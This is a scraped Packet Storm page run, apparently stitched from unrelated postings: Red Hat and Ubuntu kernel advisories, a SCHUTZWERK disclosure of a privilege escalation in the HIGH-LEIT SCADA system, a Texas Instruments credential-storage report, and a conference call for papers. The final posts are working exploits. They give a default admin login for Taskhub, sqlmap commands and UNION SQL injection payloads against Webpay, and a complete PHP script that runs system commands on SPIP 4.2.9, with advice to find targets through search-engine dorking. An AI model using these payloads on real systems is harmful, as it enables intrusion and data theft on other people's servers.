Red Hat Security Advisory 2024-6268-03 - An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a use-after-free vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6268.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: kernel-rt security update  
Advisory ID:        RHSA-2024:6268-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6268  
Issue date:         2024-09-04  
Revision:           03  
CVE Names:          CVE-2024-26946  
====================================================================

Summary: 

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: kprobes/x86: Use copy_from_kernel_nofault() to read from unsafe address (CVE-2024-26946)

* kernel: netfilter: bridge: replace physindev with physinif in nf_bridge_info (CVE-2024-35839)

* kernel: bpf, sockmap: Prevent lock inversion deadlock in map delete elem (CVE-2024-35895)

* kernel: x86/coco: Require seeding RNG with RDRAND on CoCo systems (CVE-2024-35875)

* kernel: gfs2: Fix potential glock use-after-free on unmount (CVE-2024-38570)

* kernel: bnxt_re: avoid shift undefined behavior in bnxt_qplib_alloc_init_hwq (CVE-2024-38540)

* kernel: ionic: fix use after netif_napi_del() (CVE-2024-39502)

* kernel: mm/huge_memory: don't unpoison huge_zero_folio (CVE-2024-40914)

* kernel: dmaengine: idxd: Fix possible Use-After-Free in irq_process_work_list (CVE-2024-40956)

* kernel: scsi: qedi: Fix crash while reading debugfs attribute (CVE-2024-40978)

* kernel: tipc: force a dst refcount before doing decryption (CVE-2024-40983)

* kernel: ppp: reject claimed-as-LCP but actually malformed packets (CVE-2024-41044)

* kernel: Revert "mm/writeback: fix possible divide-by-zero in wb_dirty_limits(), again" (CVE-2024-42102)

* kernel: mm: avoid overflows in dirty throttling logic (CVE-2024-42131)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-26946

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2278206  
https://bugzilla.redhat.com/show_bug.cgi?id=2281284  
https://bugzilla.redhat.com/show_bug.cgi?id=2281677  
https://bugzilla.redhat.com/show_bug.cgi?id=2281727  
https://bugzilla.redhat.com/show_bug.cgi?id=2293423  
https://bugzilla.redhat.com/show_bug.cgi?id=2293459  
https://bugzilla.redhat.com/show_bug.cgi?id=2297474  
https://bugzilla.redhat.com/show_bug.cgi?id=2297498  
https://bugzilla.redhat.com/show_bug.cgi?id=2297540  
https://bugzilla.redhat.com/show_bug.cgi?id=2297562  
https://bugzilla.redhat.com/show_bug.cgi?id=2297567  
https://bugzilla.redhat.com/show_bug.cgi?id=2300414  
https://bugzilla.redhat.com/show_bug.cgi?id=2301465  
https://bugzilla.redhat.com/show_bug.cgi?id=2301496

Red Hat Security Advisory 2024-6268-03

Red Hat Security Advisory 2024-6267-03 - An update for kernel is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a use-after-free vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6267.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: kernel security update  
Advisory ID:        RHSA-2024:6267-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6267  
Issue date:         2024-09-04  
Revision:           03  
CVE Names:          CVE-2024-26946  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: kprobes/x86: Use copy_from_kernel_nofault() to read from unsafe address (CVE-2024-26946)

* kernel: netfilter: bridge: replace physindev with physinif in nf_bridge_info (CVE-2024-35839)

* kernel: bpf, sockmap: Prevent lock inversion deadlock in map delete elem (CVE-2024-35895)

* kernel: x86/coco: Require seeding RNG with RDRAND on CoCo systems (CVE-2024-35875)

* kernel: gfs2: Fix potential glock use-after-free on unmount (CVE-2024-38570)

* kernel: bnxt_re: avoid shift undefined behavior in bnxt_qplib_alloc_init_hwq (CVE-2024-38540)

* kernel: ionic: fix use after netif_napi_del() (CVE-2024-39502)

* kernel: mm/huge_memory: don't unpoison huge_zero_folio (CVE-2024-40914)

* kernel: dmaengine: idxd: Fix possible Use-After-Free in irq_process_work_list (CVE-2024-40956)

* kernel: scsi: qedi: Fix crash while reading debugfs attribute (CVE-2024-40978)

* kernel: tipc: force a dst refcount before doing decryption (CVE-2024-40983)

* kernel: ppp: reject claimed-as-LCP but actually malformed packets (CVE-2024-41044)

* kernel: Revert "mm/writeback: fix possible divide-by-zero in wb_dirty_limits(), again" (CVE-2024-42102)

* kernel: mm: avoid overflows in dirty throttling logic (CVE-2024-42131)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-26946

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2278206  
https://bugzilla.redhat.com/show_bug.cgi?id=2281284  
https://bugzilla.redhat.com/show_bug.cgi?id=2281677  
https://bugzilla.redhat.com/show_bug.cgi?id=2281727  
https://bugzilla.redhat.com/show_bug.cgi?id=2293423  
https://bugzilla.redhat.com/show_bug.cgi?id=2293459  
https://bugzilla.redhat.com/show_bug.cgi?id=2297474  
https://bugzilla.redhat.com/show_bug.cgi?id=2297498  
https://bugzilla.redhat.com/show_bug.cgi?id=2297540  
https://bugzilla.redhat.com/show_bug.cgi?id=2297562  
https://bugzilla.redhat.com/show_bug.cgi?id=2297567  
https://bugzilla.redhat.com/show_bug.cgi?id=2300414  
https://bugzilla.redhat.com/show_bug.cgi?id=2301465  
https://bugzilla.redhat.com/show_bug.cgi?id=2301496

Red Hat Security Advisory 2024-6267-03

This paper is a collection of THC's favorite tricks. Many of these tricks are not from them, they merely collect them. They show the tricks as-is without any explanation why they work. You need to know Linux to understand how and why they work. This is an updated copy of their data from 09/03/2024.

THC Tips, Tricks, And Hacks Cheat Sheet 20240903

Vivavis HIGH-LEIT versions 4 and 5 allow attackers to execute arbitrary code as local system on systems where the "HL-InstallService-hlxw" or "HL-InstallService-hlnt" Windows service is running. Authentication is necessary for successful exploitation. The execution of the exploit is trivial and might affect other systems if the applications folder is shared between multiple systems in which case the vulnerability can be used for lateral movement.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Title  
=====

SCHUTZWERK-SA-2024-001: Privilege Escalation via Service Binary   
Hijacking in Vivavis HIGH-LEIT

Status  
======

PUBLISHED

Version  
=======

1.0

CVE reference  
=============

CVE-2024-38456

Link  
====

https://www.schutzwerk.com/advisories/schutzwerk-sa-2024-001/

Text-only version:  
https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2024-001.txt

Affected products/vendor  
========================

HIGH-LEIT by VIVAVIS AG[0]. Version 4 and 5 are different product lines,   
both are affected:

HIGH-LEIT 4 Version 4.25.00.00 to 4.25.01.01 (patch available)  
HIGH-LEIT 5 Version = 5.08.01.03 (no patch available, planned for   
31.10.2024)

Summary  
=======

HIGH-LEIT is a scalable SCADA network control system designed for   
infrastructure applications in the energy, water supply, wastewater, and   
environmental sectors, as well as associated utilities and industrial   
applications. HIGH-LEIT is used for operational networks in critical   
infrastructure.  
The Windows services "HL-InstallService-hlnt" for HIGH-LEIT Version 4   
and "HL-InstallService-hlxw" for Version 5 allow for an authenticated   
attackers in the Active Directory group "HL-TS-Gruppe" to escalate their   
privileges to local system.

Risk  
====

The vulnerability allows attackers to execute arbitrary code as local   
system on systems where the "HL-InstallService-hlxw" or   
"HL-InstallService-hlnt" Windows service is running. Authentication is   
necessary for successful exploitation. The execution of the exploit is   
trivial and might affect other systems if the applications folder is   
shared between multiple systems in which case the vulnerability can be   
used for lateral movement.

Description  
===========

During a penetration test, SCHUTZWERK tested a terminal server part of   
an internal OT Network. The software HIGH-LEIT 5 was found to be   
installed on this terminal server.

HIGH-LEIT 5 has a windows service named "HL-InstallService-hlxw", that   
runs as local system with start mode "autostart". By default, for   
affected versions, the executable "D:\hlxw\update\bin\prunsrv.exe" is   
modifiable by the Active Directory group "HL-TS-Gruppe". The granted   
modify permission on "D:\hlxw\update\bin\prunsrv.exe" is inherited from   
the modify permission on the folder "D:\hlxw". The Active Directory   
group "HL-TS-Gruppe" is needed for every user interacting with the   
HIGH-LEIT software. This means this exploit is available from any   
HIGH-LEIT user with low privileges (e.g. auditors with read-only   
permissions). The user can modify the executable "prunsrv.exe" and wait   
for or force a system reboot. Afterwards the modified "prunsrv.exe" is   
executed as local system on the server.

Solution/Mitigation  
===================

For HIGH-LEIT Version 4:  
- - Update to version 4.25.01.02 or newer, or  
- - apply the vendors workaround via GPO to mitigate the vulnerability, or  
- - manually remove the modify permission of the Active Directory group   
"HL-TS-Gruppe" on the folder "D:\hlnt".

For HIGH-LEIT Version 5:  
- - Update to version 5.8.01.04 (release planned for 31.10.24), or  
- - apply the vendors workaround via GPO to mitigate the vulnerability, or  
- - manually remove the modify permission of the Active Directory group   
"HL-TS-Gruppe" on the folder "D:\hlxw".

Disclosure timeline  
===================

2024-05-14: Vulnerability discovered  
2024-05-14: Vulnerability reported and presented to affected customer  
2024-05-16: Vulnerability presented to vendor  
2024-05-16: Vulnerability details reported to vendor  
2024-05-17: Vendor started working on patch  
2024-05-22: Vendor started deploying workaround to customers  
2024-06-05: Green light from customer for Advisory  
2024-06-13: Patch for HIGH-LEIT 4 finished  
2024-06-13: Meeting with vendor to plan disclosure/patch release  
2024-06-14: CVE-2024-38456 reserved  
2024-08-16: Vendor finished deployment of patch/workaround for all   
affected customers  
2024-08-16: Meeting with vendor to plan disclosure  
2024-08-23: Meeting with vendor to plan disclosure  
2024-09-02: Disclosure by SCHUTZWERK  
2024-09-02: Disclosure by vendor at   
https://www.vivavis.com/service/it-security-bulletin/

Contact/Credits  
===============

The vulnerability was discovered during an assessment by Lukas Krieg   
(lkrieg@schutzwerk.com) of SCHUTZWERK GmbH.

References  
==========

[0] https://www.vivavis.com/loesung/leittechnik/high-leit/  
[1] https://www.vivavis.com/service/it-security-bulletin/

Disclaimer  
==========

The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may   
be updated in order to provide as accurate information as possible. The   
most recent version of this security advisory can be found at SCHUTZWERK   
GmbH's website ( https://www.schutzwerk.com ).

SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/

SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/  
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmbVfC0aHGFkdmlzb3Jp  
ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrvLwhAAmq8ALbZdWarhHZGgPAMJ  
5mU/24qCCY5M3roi4zBv9GFzSbJVF4TdgpceOkyrCYHtTZWGEYdc8ewd6DLarweH  
Kcj+KyCA6JIbb94E2CVrDAXgpjJWsvG1CSvHax+erG/FppEk/ud9t+DJhCSVbkMT  
KeqTz1G02tpKnHVgd2ogVF9ydJVdEcV4QJD/tkUfQukWomIGNRt+JNoxcCv362H1  
fk3uVghrXxWeo3P0oDvWg4S2+3IEZPPtW1PCqfo9SFO2Ll7xF/2015Hl1Sn0TOAA  
y4JJqDNOwIN5hIP6JvIs+W6uLLU3IGFUEWg1CiplOY3CC1kfEorQtvsDamNq9QWF  
2r6CaWNN2FYpHkiEygYJsnn8Z3vzqqQQnaym2mwlsxe0ggutADCg2FbkybqTUF+D  
fUGoQjaq7eojUTGS7fgNlOUua2euImjv9NMpzg00yMb6os6P+HetT+fv2G67TLKS  
ptqQ73H+On4h2DP/DPkF1q7hBBZtT1I2Xx6er65AtSKjwOsLBOWSR1BNW+QJ/D56  
pPhYHR+lVakHO/TMzILys5dPSXY3TU1iX0XpgvddIqONgViMR54a5MV/Vv1lL9xb  
qEcGtqtX84cg74vQuwUbl69pP+69Y+ACDoBdaemRex1tjR6seFBI27XRsn+E8a+a  
kQGdwKyB2qT0UNuLyFhcVi4=  
=3K1g  
-----END PGP SIGNATURE-----  
--   
SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany  
Zertifiziert / Certified ISO 27001, 9001 and TISAX

Phone +49 731 977 191 0

advisories@schutzwerk.com / www.schutzwerk.com

Geschäftsführer / Managing Directors:  
Jakob Pietzka, Michael Schäfer

Amtsgericht Ulm /  HRB 727391  
Datenschutz / Data Protection www.schutzwerk.com/datenschutz

Vivavis HIGH-LEIT 4 / 5 Privilege Escalation

Texas Instruments Fusion Digital Power Designer version 7.10.1 allows a local attacker to obtain sensitive information via the plaintext storage of credentials.

    Insufficiently Protected Credentials in Texas Instruments Fusion Digital Power Designer v.7.10.1Credit: Gionathan Armando Reale//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////# Product:  Fusion Digital Power Designer - Version 7.10.1# Vendor:   Texas Instruments# CVE ID:   CVE-2024-41629# Vulnerability Title: Insufficiently Protected Credentials# Severity: Medium# Author(s): Gionathan Armando Reale# Date:     2024-08-15##############################################################Introduction:An issue in Texas Instruments Fusion Digital Power Designer v.7.10.1 allows a local attacker to obtain sensitive information via the plaintext storage of credentials.Vulnerability PoC:1. Create a connection within the application that requires credentials.2. Access the file "C:/Program Files (x86)/Texas Instruments/Fusion Digial Power Designer/data/prefs-shared.xml"3. Notice the credentials stored as plaintext./////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

Texas Instruments Fusion Digital Power Designer 7.10.1 Credential Disclosure

The No cON Name 2024 call for papers has been announced. It will be held in Barcelona, Spain, from November 18th through the 20th, 2024.

    ************************************************  Call For Papers NcN 2k24 ***************************************************ph3ar disinformation and cognitive controlhttps://www.noconname.org/call-for-papers/Exact place not disclosed until a few weeks before due celebration.     * INTRODUCTIONThe organization has  opened CFP proposals. No cON Name is the eldest Hacking and Security Conference in Span. Our goal is to get highly qualified requests for both, speaker opportunities, as well as workshops, to show in  one of  the most  respected hacker conferences in   Barcelona and Spain, NcN (No cON Name). We will cellebrate as the last edition, 2 tracks:  * Privacy and net neutrality Track. (November 18th)  * Cybersecurity Track (November 19-20th)We will be accepting exclusively technical  presentations, proof of concept for, private  investigations  and  solutions  for  professionals   related  to the  IT security scene. Under no circumstance we will be selecting any proposal which is commercially targeted, our main goal is to share knowledge in a well-established community.     * FORMAT & REQUIREMENTS   - Language: English ( We will choose almost 75% ) or Spanish   - Proposal file type: PDF. It must follow  documentations requirements, shown     in next paragraph, and filled in through the web site.   - Please use the template provided for the presentations during the conference   - It's necessary to  deeply explain contents, as this document  will allow the     organization to evaluate the proposal.   - CFP's attachment  requested is mandatory. One page  summary of the contents,     or the investigations that you want to show will help to demonstrate techni-     cally the findings/result of investigations (additional texts, screenshots, evidences, code, etc)     WE DON'T ACCEPT PROPOSALS PRESENTED IN SPAIN BEFORE THE NOCONNAME'S CONGRESS DATE.In the event  that the  proposal  is accepted, it must be  submitted before the deadline (detailed in the important dates section below):   - An  article (a  template  in doc, odt  format  is  attached.) that will be delivered in the conferences notebook. MANDATORY   - Presentation and exhibition  material: All the material     that will be  presented to the organization  must be delivered, otherwise it will be possible to  grant other applicants your place. You have to plan the day of the event nimbly. MANDATORY     * CONTENTSWe will require the following info to review your CFP:DATA                         DESCRIPTIONPreferred contact method     Alias, email, X account, Telegram, Signaletc.  Name & Surname*  Alias *  Email *  Phone nº *  X, Telegram, Signal id  City/Country of residence *Proposal  Proposal type *             Speaking presentation or Workshop presentation  Representing *              Individual or company name  Category *                  See: RELEVANT TOPICS  Length (minutes) *          Speaker (presentation):Between 20 or 45            minutes.                              Workshop (presentation + demo):  45 minutes                              or 1,5 hours.  Title of the paper *:       Presentation's / Workshops Title  Goal*                      State  your objectives  during your investigation,                              issues encountered, impact on the society including                              risks.  Benefits*                  List  the   benefits  your   presentation                 will  be                              providing to the security community, social impact,                              and perhaps solutions to the current issue.  Description *               Presentation's / Workshop's description  Speaker's Biography *       Brief bio of latest published papers, previous talk                              experience, your current interests.     * RELEVANT TOPICSThe areas of interest that have been proposed, not restricted to, are:   - Offensive security.   - Evading / In-depth research of Phishing / Malware.   - Security & exploiting SCADA / ICS.   - Internet privacy and net neutrality (EPIC).   - Honeypots / Honeynets.   - Web explorers' security.   - Hardware hacking.   - New vulnerabilities and 0-day exploits.   - Healthcare sucurity / risks   - (in)Security in the automotive industry   - Software Testing/Fuzzing.   - Advanced Penetration testing techniques.   - Mobile Application Security-Threats and Exploits.   - Network and Router Hacking   - Mobile, Satellite, IP networks security   - SDR (Software defined radio)   - Hacking virtualized envirorments   - Computer/electronic forensics   - Bluetooth vulnerabilities.   - Videconference application vulnerabilities.     * DEADLINES   - CFP Requests closing: October 15th 2024.   - CFP Approval: October, 20th 2024.   - Materials presentation due: November, 1st  2024   - (Cybersecurity Track) Conference's date: November, 19th,20th 2024     * SENDING YOUR CFP   All requests must be submitted through our site at:   https://www.noconname.org/call-for-papers/   Fill in the form  and upload necessary files and you are  all set (some parts of website are in spanish)     - EVALUATION CRITERIA FOR PROPOSALSWe will be evaluating speaking  conference and workshop requests with the following score:   - Level  of  innovation  in  your  investigation / Sophistication  of the  40% presentation   - Stating your key-points of your proposal without going deep into detail 20%   - Briefing quality of your draft (proof of concept in  briefing is highly 15% appreciated)   - State field where your investigation  was made, ie:hardware, software, 10% industry.   - Your speaking reputation 10%   - Relevant topic proposed by the No cON Name staff 5%

No cON Name 2024 Call For Papers

Ubuntu Security Notice 6973-4 - It was discovered that a race condition existed in the Bluetooth subsystem in the Linux kernel, leading to a null pointer dereference vulnerability. A privileged local attacker could use this to possibly cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6973-4September 02, 2024linux-raspi-5.4 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-raspi-5.4: Linux kernel for Raspberry Pi systemsDetails:It was discovered that a race condition existed in the Bluetooth subsystemin the Linux kernel, leading to a null pointer dereference vulnerability. Aprivileged local attacker could use this to possibly cause a denial ofservice (system crash). (CVE-2024-24860)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - SuperH RISC architecture;   - MMC subsystem;   - Network drivers;   - SCSI drivers;   - GFS2 file system;   - IPv4 networking;   - IPv6 networking;   - HD-audio driver;(CVE-2024-26830, CVE-2024-39484, CVE-2024-36901, CVE-2024-26929,CVE-2024-26921, CVE-2021-46926, CVE-2023-52629, CVE-2023-52760)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS   linux-image-5.4.0-1115-raspi    5.4.0-1115.127~18.04.1                                   Available with Ubuntu Pro   linux-image-raspi-hwe-18.04     5.4.0.1115.127~18.04.1                                   Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6973-4   https://ubuntu.com/security/notices/USN-6973-3   https://ubuntu.com/security/notices/USN-6973-2   https://ubuntu.com/security/notices/USN-6973-1   CVE-2021-46926, CVE-2023-52629, CVE-2023-52760, CVE-2024-24860,   CVE-2024-26830, CVE-2024-26921, CVE-2024-26929, CVE-2024-36901,   CVE-2024-39484

Ubuntu Security Notice USN-6973-4

Taskhub version 2.8.8 suffers from an ignored default credential vulnerability.

**Taskhub 2.8.8 Insecure Settings**

Posted Sep 3, 2024

Authored by indoushka

Taskhub version 2.8.8 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 2c385d7b29ff2d1f0cadb673bff0447f2a27c839cc502710002b3eab58740544

Download | Favorite | View

**Taskhub 2.8.8 Insecure Settings**

    =============================================================================================================================================| # Title     : Taskhub v2.8.8 Insecure Settings Vulnerability                                                                              || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874                                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 12345678[+] https://www/127.0.0.1/tasks.octalfoxcom/auth/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,625)
*   Arbitrary (17,028)
*   BBS (2,859)
*   Bypass (1,898)
*   CGI (1,047)
*   Code Execution (7,868)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,420)
*   DoS (25,190)
*   Encryption (2,389)
*   Exploit (54,101)
*   File Inclusion (4,271)
*   File Upload (1,007)
*   Firewall (822)
*   Info Disclosure (2,911)
*   Intrusion Detection (916)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,252)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,205)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,399)
*   Protocol (3,745)
*   Python (1,652)
*   Remote (31,810)
*   Root (3,668)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,035)
*   Shell (3,295)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,291)
*   SQL Injection (16,693)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (671)
*   Vulnerability (33,048)
*   Web (10,128)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,278)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,114)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,006)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,685)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,797)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,757)
*   Other

Taskhub 2.8.8 Insecure Settings

Webpay E-Commerce version 1.0 suffers from a remote SQL injection vulnerability.

    =============================================================================================================================================| # Title     : Webpay E-Commerce v1.0 SQL Injection Vulnerability                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : catproduct.php?catpro=6[+] E:\sqlmap>python sqlmap.py -u https://127.0.0.1/gajrajgraphicscomnp/home/catproduct.php?catpro=6 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs[+] Parameter: catpro (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: catpro=6' AND 5853=5853-- KEle    Type: UNION query    Title: Generic UNION query (NULL) - 15 columns    Payload: catpro=6' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a6b71,0x646943714b4944576a41457943417a7652655a6579596c62475a63504a41756d7076426d65686e75,0x7171767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Webpay E-Commerce 1.0 SQL Injection

SPIP version 4.2.9 suffers from a code execution vulnerability.

    =============================================================================================================================================| # Title     : SPIP 4.2.9 PHP Code execution Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 49 : Set your target.[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass IndoushkaExploit {    private $targetUrl;    private $payload;    public function __construct($targetUrl, $payload) {        $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';        $this->payload = $this->generatePayload($payload);    }    private function generatePayload($payload) {        // توليد الحمولة مع تضمين الأمر المراد تنفيذه        return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";    }    public function exploit() {        // إعداد بيانات POST التي سيتم إرسالها إلى الهدف        $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);        // تهيئة طلب HTTP باستخدام دالة cURL        $ch = curl_init($this->targetUrl);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        // إضافة رؤوس مخصصة لتجاوز المنع        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/x-www-form-urlencoded',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'        ]);        // تنفيذ الطلب        $response = curl_exec($ch);        // تحقق من وجود أخطاء في cURL        if (curl_errno($ch)) {            echo "cURL Error: " . curl_error($ch) . "\n";        } else {            echo "Exploit Sent! Response:\n";            echo $response;        }        curl_close($ch);    }}// مثال على الاستخدام$targetUrl = 'https://example/spip/'; // استبدل هذا بالعنوان الحقيقي$payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها$exploit = new IndoushkaExploit($targetUrl, $payload);$exploit->exploit();Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Source

Packet Storm